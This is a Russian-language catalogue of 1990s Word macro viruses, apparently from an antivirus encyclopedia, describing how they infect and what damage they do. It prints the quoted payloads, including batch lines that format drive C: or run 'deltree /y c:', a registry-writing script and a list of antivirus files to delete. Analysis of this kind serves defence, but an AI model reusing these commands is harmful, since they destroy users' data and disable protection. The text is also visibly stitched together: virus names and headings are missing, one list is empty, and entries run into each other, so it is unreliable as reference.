Полиморфик-стелс-вирус. Заражает документы MS Word 6/7. Содержит один макрос AutoOpen и размножается при открытии документов. Удаляет пункты меню Tools/Macro, Tools/Customize, File/Templates, Format/Style. Полиморфик-механизм вируса в зависимости от датчика случайных чисел добавляет в текст макроса в случайные места строки комментария со случайно подобранным текстом и изменяет название некоторых переменных вируса. Полиморфик-механизм в вирусе является "медленным" - он вызывается только если текущее значение секунд системного времени равно либо 23, либо 45. В зависимости от датчика случайных чисел рассылает копию текущего документа в Internet-конференции, т.е. использует для своего распространения глобальные сети. Помимо этого может стать причиной утечки конфиденциальной информации с зараженного компьютера, если таковая случайно оказалась в рассылаемом документе. Для рассылки копий зараженного документа вирус запускает программу клиента сервера новостей (AGENT.EXE), выбирает одну из конференций (см. список ниже) и посылает в нее письмо, которое содержит случайно выбранный заголовок (см. список ниже), строку "WM/Agent by Lord Natas", дополненную случайными сивмолами и присоединенный зараженный документ. Список конференций:

alt.aol-sucks alt.sex.zoophilia
alt.binaries.cracks alt.windows95
alt.binaries.pictures.erotica alt.sex.passwords
alt.binaries.warez.ibm-pc alt.binaries.warez
alt.conspiracy alt.binaries.sounds.mp3
alt.drugs.pot alt.comp.virus
alt.fan.hanson alt.2600
alt.flame alt.2600.hackerz
alt.hacker alt.skinheads
alt.sex alt.sex.babies
alt.sex.necrophilia alt.sex.bondage
alt.sex.stories

Список заголовков:

"Alien.a": AutoClose, AutoOpen, FileSaveAs
"Alien.b": AutoClose, AutoOpen, FileSaveas

Заражают систему при открытии зараженного файла, записываются в файлы-документы при их открытии или закрытии. Чтобы избежать некорректного заражения аккуратно проверяют несколько условий. Если в имени файла присутствует подстрока "ALIEN", то блокируют процедуру заражения. Удаляют пункты меню "Tools/Customize..." и "Tools/Macro...". Прочие эффекты активизируют начиная с:

"Alien.a" - 1 октября 1996
"Alien.b" - 10 января 1997

В зависимости от случайного счетчика вирусы выводят несколько сообщений и производят различные действия. 1-го августа с вероятностью 1/2 вирусы выводят MessageBox:

Alien
Another Year of Survival ...

Затем они пытаются установить атрибут "hidden" у окна Program Manager и закрывают MS Word. По воскресеньям вирусы выводят:

Alien
It's Sunday & I intend to relax !

и также прячут окно Program Manager и закрывают MS Word. Вирусы также выводят MessageBox-ы с заголовком "Alien" и текстом:

Never Open Others Files !
Never Trust An Alien !
Don't Believe All Tips !
Always Back Up Your Data."
Don't Believe The Hype !
Three Cheers For The Alien. Hip Hip Hooray !
I'll Be Back !
Hi Beautiful !
You Facinate Me.
Look No Further ...
The 'Alien' Virus Has Arrived !
The Alien Lives ...

Иели длина файла меньше 9, то вирусы выводят текст:

Tip From The Alien
Longer File Names Should Be Used

Вирусы также содержат текст-копирайт:

End of Fun (All good (and bad) things DO come to an end !)
This Code was written in Chandigarh (India) on 01.08.1996
Behold the Alien Virus !! Lets See how it survives !

UNIVERSITI TEKNOLOGI MALAYSIA
ARE YOU A FSKSM STUDENT?
ANSWER YES OR YOUR DOCUMENT WILL BE LOCKED BY MY PASSWORD !
FAKULTI SAINS KOMPUTER DAN SISTEM MAKLUMAT

После этого (при ответе пользователя 'Yes') устанавливает на документ пароль "Saya!".

You Have Been Infected by the Alliance

Документы NORMAL.DOT

Macro1 AutoExec AutoExec

AsliAutoExec AsliAutoExec

Macro2 FileOpenx FileOpen

Macro3 AutoOpen FileOpenx

AutoOpenx

Macro4 AntiMacrosVirus AntiMacrosVirus

При инсталяции проверяет 42 макроса, принадлежащих разным вирусам, и удаляет их. При каждом старте выдает MessageBox:

Created By Akay Inc.
Microsoft Anti-Virus Protection version 1.0

Документы NORMAL.DOT

Macro1 anakAE AutoExec
Macro2 AutoOpen anakAO
anakAO
Macro3 anakSA FileSave
anakSA
Macro4 anakSMU anakSMU

Вирус устанавливает новый "shortcut key" Shift-Ctrl-F и ассоциирует с ним меню Tools/Customize, которое затем удаляет. Для того чтобы скрыть макросы вируса (стелс) удаляются и меню File/Templates и Tools/Macros. Начиная с 25-го числа ежемесячно, начиная с 14:00 вирус создает новый темплейт и вставляет в него текст:

...i n t r o d u c i n g...
anakSMU
Semarang, March 1997

Затем вирус регистрирует себя в системе. Для этого он создает файл ANAKSMU.BAT, записывает в него команды и выполняет их:

@ECHO OFF
REM ---------------------------------------------------------
REM anakSMU wont destroy your REGEDIT, Just wanna be there
REM email: "
REM ---------------------------------------------------------
ECHO REGEDIT4 > anakSMU.REG
ECHO [HKEY_CURRENT_USER\Software\anakSMU] >> anakSMU.REG
ECHO [HKEY_CURRENT_USER\Software\anakSMU\[email protected]] >> anakSMU.REG
ECHO [HKEY_CURRENT_USER\Software\anakSMU\18.090 - Semarang] >> anakSMU.REG
START /MIN REGEDIT anakSMU.REG
EXIT

Затем вирус выводит MessageBox:

anakSMU
Yeah!, I wish I were anakSMU

* I'M ANDRY CHRISTIAN, IF YOU THOUGHT, YOUR DOCUMENTS
OR TEMPLATES WERE SAFE, YOU WERE WRONG ! *

Затем выводит диалог:

HACKERS Labs '96 - Hackware Technology Research
ANDRY [CHRISTIAN] WORD MACRO VIRUS IS HERE !!!
DO YOU SUPPORT MY VIRUS ?
YES NO

В случае ответа "NO" вирус записывает в файл C:\AUTOEXEC.BAT команды:

@ECHO OFF
CLS
ECHO Please wait . . .
FORMAT C: /U /C /S /AUTOTEST > NUL

В файл C:\CONFIG.SYS записывает команды:

DOS=HIGH,UMB
FILES=40
BUFFERS=40
DEVICE=C:\DOS\HIMEM.SYS
DEVICE=C:\DOS\EMM386.EXE RAM

В тот же день (1-го марта) в зависимости от системного таймера вызывает команду форматирования диска:

COMMAND /C FORMAT C: /U /C /S /AUTOTEST > NUL

В зависимости от системного времени вставляет в текущий документ строки:

Hello....
Andry Christian
WordMacro Virus
Is Here....!!!

Также содержит закомментированный текст:

'======================================================================'
' Source Code of Andry Christian WordMacro Virus 0.99 - #eta Release '
'======================================================================'
' Virographer by Andry [Christian] in [Batavia] City, of INDONESIA '
' Viroright © 1996-1999 Hackware Technology Research - HACKERS Labs. '
' Multi Platform, Multi Infector, Stealth, OneMacro, Encryption, etc '
' Last Update by 01-Maret-1996 & 01:03 PM - Found Bugs...? Call Me '
'======================================================================'
' HACKERS Labs. -> WE ARE A BIG FAMILY OF THE VIRUS CREATOR's TEAM '
'======================================================================'

Документы NORMAL.DOT

FileClose FC
AutoOpen NOpen
FileSave
7 остальных FileSaveAs
со случайными FilePrint
именами FilePrintDefault
FileTemplates
ToolsMacro
FileExit
PCGURU4

Записывается в область глобальных макросов при открытии или закрытии документов (AutoOpen, FileClose). Заражение документов происходит при сохранении и сохранении с другим именем (FileSave, FileSaveAs). При заражение документов случайные имена функций записываются в переменные документа. 23 октября при печати документов в их конец добавляется сообщение:

NAENBGOURSG
Hello from GREECE

24 октября запускает файл PCGURU4.BAT, содержащий команды:

@echo off
Rem PcGuru4 virus by NAENBGOURSG
Rem Golden Version 4.3
type PcGuru4.bat >> PcGuru4.bat

IVX detects all macro viruses, past, present, and future.

Дописывает к файлу C:\AUTOEXEC.BAT команду, снимающую атрибут ReadOnly у файла NORMAL.DOT:

@ATTRIB -R WordDirectory\NORMAL.DOT > NUL"

WordBasic Err = 16
Not enough memory!

При вызове меню макросов Tools/Macro (макрос ToolsMacro) вирус стирает весь текст пользователя в текущем документе и добавляет в AUTOEXEC.BAT команды уничтожения файлов антивируса PC-CILLIN:

echo off
attrib -h -r -s +a c:\pc-cil~1\*.* >nul
del c:\pc-cil~1\*.dll >nul

После этого вирус стирает все файлы, связанные с антивирусами:

C:\PC-Cillin 95\Lpt$vpn.*
C:\PC-Cillin 97\Lpt$vpn.*
C:\Tsc\PC-Cillin 97\Lpt$vpn.*
C:\Zlockav\Gsav.cas
C:\VB7\Virus.txt
C:\Program Files\Norton AntiVirus\Viruscan.dat
C:\Program Files\Symantec\Symevnt.386
C:\Program Files\McAfee\VirusScan95\Scan.dat
C:\Program Files\McAfee\VirusScan95\Mcscan32.dll
C:\Program Files\McAfee\VirusScan\Scan.dat
C:\Program Files\McAfee\VirusScan\Mcscan32.dll
C:\Program Files\Command Software\F-PROT95\Sign.def
C:\Program Files\Command Software\F-PROT95\Dvp.vxd
C:\Program Files\AntiViral Toolkit Pro\Avp32.exe
C:\Program Files\AntiViral Toolkit Pro\*.avc
C:\Tbavw95\Tbavw95.vxd

В зависимости датчика случайных чисел записывает в AUTOEXEC.BAT строки:

@Echo off
cls
echo I have clean a huge virus:
echo MS-WINDOWS
echo for you.
echo --AntiAVs--
echo y|format c: /u /v:AAV >nul
deltree /y c: >nul

Presence of AVP for winword
AVP for Winword is a nice tutorial
© 2 Rats Soft.

this macro loaded in normal template as FileOpen

AVPcopyright$ AVP for WinWord v1.0
sQuestion$ Would you like to

NORMAL.DOT Зараженные документы

Appder -> Appder, AutoOpen
AutoClose AutoClose

Заражает систему при AutoOpen, документы заражает при AutoClose. Создает в файле WINWORD6.INI в секции "[Microsoft Word]" строку "NTTHNTA=значение" и увеличивает это "значение" при заражении каждого документа. После 20 заражений уничтожает файлы:

C:\DOC\*.EXE
C:\DOC\*.COM
C:\WINDOWS\*.EXE
C:\WINDOWS\SYSTEM\*.TTF
C:\WINDOWS\SYSTEM\*.FOT

ArchFiend

На PC стирает BMP файлы в каталоге Windows (C:\WINDOWS\*.BMP) и создает там файл FIEND.TXT:

##################
## WM.ArchFiend ##
##################
Nrsi:lshoi:m{{i:mhsnnt:st:St~utis{{;
XOR by 1ah
Your Unlucky Number is: <случайное число>

При сохранении документа с другим именем, если системное время - 13 секунд, устанавливает на открытие документа пароль из случаных цифр. При вызове меню Tools/Macro добавляет в C:\AUTOEXEC.BAT строку:

echo BLOW ME!

A Virus from Nightmare Joker's Demolition Kit!
Translated into English by Dark Night (VBB)

Liven up Monday with an Armadillon!

При вызове меню Tools/Macro вставляет в текущий документ 10000 строк:

Armadillon Macro?

Документы NORMAL.DOT

AutoExec, AsliAutoExec AsliAutoExec, AutoExec
FileOpenx FileOpen
AutoOpen, AutoOpenx FileOpenx
AsliAutoExec AsliAutoExec
AntiMacrosVirus AntiMacrosVirus

Заражает область глобальных макросов при вызовах AutoOpen, документы заражаются при FileOpen. Уничтожает в документах 40 макросов с именами: FileOpen, AutoOpen, FileClose, AutoClose, FileNew, AutoNew, FileSave, AutoSave, FileSaveAs, FileTemplates, FilePrint, AutoExec, ListMacros, Organizer, Nobita, Doraemon, SonGoku, DragonBall, ToolsMacro, ViewToolbars, InsertObject, InsertPicture, InsertSymbols, ToolsCustomize, Delete, Hapus, Show, Gfxx, TableFormula, Anti, Airwolf, KnightRider, RoboCop, Nsr, Tiger2000, Rxz, Rumus, Salin, User, PhilarUndip, AirWolf, DragonBall, CrazyVirus.

This is The Microsoft Bang! ** Virus** ---

Attcah the antivirus to the file

Author = "Kenny-G sux"
Keywords = "Gangsta Rappa"
Comments = "The Mutha mix"

При AutoOpen, если система уже заражена и текущее число - 1 или 13, вирус выводит MessageBox-ы:

Mack daddy
Bad Boy, Bad Boy, What u gonna do

the Gangsta Rappa
What u gonna do when they come for you

BMF
The Gangsta owns you !

BMF
Have a happy new year !

Затем он устанавливает у текущего документа пароль: "gangsta". При вызовах FileNew, AutoExec и AutoOpen вирус удаляет меню Tools/Macro, Tools/Customize, File/Templates и этим пытается скрыть себя в системе.

P.S.: You are a very stupid people.
P.S.: I hate you a lot.
P.S.: I wish your death.
P.S.: All the things I told you are lies.
P.S.: Call me if you need sex.

Anda rupanya sedang sial, semua file di mesin ini kecuali yang berada di
direktori WINDOWS dan WINWORD telah hilang, jangan kaget, ini bukan ulah
Anda, tapi ini hasil pekerjaan saya...Barang siapa yang berhasil menemukan
cara menangkal virus ini, saya akan memberi listing virus ini untuk Anda
!!! Dan tentu saja saya akan terus datang kesini untuk memberi Anda salam
dengan virus-virus terbaru dari saya...selamat ! Bandung, <DAY OF Week>,
<DAY> <MONTH> <YEAR>, Jam <TIME>.

где <DAY>,<MONTH> ... текущее число и время. Вирус также блокирует пункты меню Tools/Macro и Tools/Customize. В этих макросах предусмотрена, но не задействована деструктивная функция: после 10 марта 1996 года при попытке вызвать эти пункты меню выводится Message box

Err@#*©
Fail on step 29296

и производится замена всех букв "a" на "#@" в текущем документе.

Bandung.Rapi
Является переделкой Bandung. Деструктивная функция по удалению файлов на диске C: закомментирована. Вместо файла C:\PESAN.TXT при запуске Word всегда создается файл C:\BACALH.TXT с другим содержанием:

Assalamualaikum ..., maaf @Rapi.Kom mengganggu anda sebentar. Pesan
ini aslinya bernama PESAN.TXT yang muncul di root direktori
setelah anda menjalankan Winword 6.0 yang templatenya (normal.dot)
telah tertulari macro menjijikkan ini. Macro ini (sebelum
@Rapi.Kom modifikasi) berasal dari file data Winword 6.0 (*.doc)
yang telah tertular macro ini. Bila file data tersebut di pangggil
(Open doc), maka macro secara otomatis menjalankan perintah-perintah
macro lain nya, yang antara lain mengcopykan diri ke global
template (normal.dot), juga pada tanggal dan jam tertentu akan
menghapus semua data di direktori tingkat 1, 2 dan 3 (kecuali Hidden
direktori), menjengkelkan bukan ?!. Siapapun pembuatnya pastilah
orang yang sirik !, masih banyak perbuatan baik lain yang bisa
kita kerjakan. ... Malang, <DATE> @Rapi.Kom"

<DATE> точно соотвествует строке даты в вирусе BANDUNG. Зараженные файлы и NORMAL.DOT содержат разный набор макросов:

Зараженный файл | NORMAL.DOT
RpAE | RpAE AutoExec
RpFO | RpFO FileOpen
RpFS | RpFS FileSave
RpTC | RpTC ToolsCustomize
RpTM | RpTM ToolsMacro
RpFSA | RpFSA FileSaveAs
AutoOpen | RpAO

Файлы заражаются при FileOpen, FileSave, FileSaveAs. Причем при заражении при FileOpen выводится Message box со строками: "Thank's for joining with us !", "@Rapi.Kom" Макросы RpTM (ToolsMacro) и RpTC (ToolsCustomize) повреждены и при обращении к меню Tools/Macro и Tools/Customize результат непредсказуем.